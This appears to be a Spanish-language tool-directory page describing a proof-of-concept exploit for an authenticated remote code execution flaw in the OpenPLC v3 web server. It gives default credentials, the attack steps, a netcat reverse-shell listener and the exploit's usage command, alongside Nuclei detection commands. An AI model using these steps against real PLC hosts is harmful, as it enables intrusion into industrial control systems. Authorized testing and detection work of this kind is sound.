Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
OpenPLC-CVE-2021-31630-RCE | Kitploit
Herramientas/GitHubGitHub/machevalia/openplc-cve-2021-31630-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubmachevalia/openplc-cve-2021-31630-rce

OpenPLC-CVE-2021-31630-RCE

Ver Repositorio
32hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

OpenPLC v3 RCE autenticado (CVE-2021-31630)

Este es un exploit de prueba de concepto moderno y compatible con Python 3.13+ para CVE-2021-31630, una vulnerabilidad en OpenPLC v3 que permite a un usuario autenticado subir una capa de hardware personalizada que contiene código malicioso, lo que lleva a la ejecución remota de código (RCE) en el host.

Descubrimiento original de la vulnerabilidad y aviso por Fellipe Oliveira. Esta reimplementación y modernización utiliza httpx, herramientas CLI, registro de logs y técnicas de detección más seguras.

Resumen del exploit

  • Vulnerabilidad: CVE-2021-31630
  • Componente: Servidor web de OpenPLC v3
  • Impacto: Ejecución remota de código autenticada
  • Credenciales por defecto: openplc:openplc

Flujo del exploit

  1. Iniciar sesión con credenciales válidas
  2. Subir código C malicioso como capa de hardware personalizada
  3. Desencadenar la compilación
  4. Desencadenar la ejecución (opcional)
  5. Recibir la conexión de reverse shell

Uso

  1. Iniciar un listener:
root@kitploit:~
nc -lvnp 9001
  1. Ejecutar el exploit:
root@kitploit:~
python3 openplc_rce.py http://target:8080 -lh TU_IP -lp 9001

Banderas opcionales:

  • -u Usuario (por defecto: openplc)
  • -p Contraseña (por defecto: openplc)
  • -t Tiempo de espera en segundos (por defecto: 20)

Características

  • Compatible con Python 3.13+
  • Construido con httpx
  • Soporte de registro (logging) para una salida limpia
  • Funciones modulares para una reutilización más sencilla
  • Plantillas de detección Nuclei incluidas

Plantillas de detección Nuclei

  1. Comprobación de credenciales por defecto
root@kitploit:~
nuclei -t nuclei-templates/openplc-default-login.yaml -u http://target:8080
  1. Comprobación pasiva de vulnerabilidad RCE
root@kitploit:~
nuclei -t nuclei-templates/openplc-authenticated-rce-check.yaml -u http://target:8080

La segunda plantilla inicia sesión e intenta una carga de payload inofensiva más una compilación para confirmar la vulnerabilidad probable, sin desencadenar la ejecución real de código.

Archivos incluidos

  • OpenPLC_CVE_2021_31630.py – Exploit para Python 3.13+
  • nuclei-templates/openplc-default-login.yaml – Detecta credenciales por defecto
  • nuclei-templates/openplc-authenticated-rce-check.yaml – Detecta comportamiento vulnerable de forma segura

⚠️ Legal / Ética

Este código es solo para fines educativos y pruebas de seguridad autorizadas. No lo utilices sin permiso explícito del propietario del sistema.

Descargar herramienta